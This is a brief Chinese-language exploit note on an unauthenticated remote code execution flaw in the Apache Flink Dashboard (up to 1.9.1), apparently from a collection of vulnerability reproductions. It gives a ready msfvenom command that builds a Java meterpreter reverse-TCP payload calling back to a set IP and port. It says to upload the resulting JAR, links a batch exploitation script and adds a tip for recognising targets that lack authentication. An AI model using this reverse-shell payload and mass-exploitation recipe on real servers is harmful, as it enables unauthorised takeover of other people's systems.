Apache Flink Dashboard 未授权访问-远程代码命令执行
一、漏洞简介
Apache Flink的任意Jar包上传导致远程代码执行的漏洞
二、漏洞影响
<= 1.9.1(最新版本)
三、复现过程
1、
msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar
2、
上传alewong Jar包
批量脚本
https://github.com/ianxtianxt/Apache-Flink-Dashboard-rec
Ps:
当注释掉 if 'Unable to load requested file' in str(data):
之后,出现Token为空,或者 Unauthorized request 时候是不存在未授权访问的,而是带授权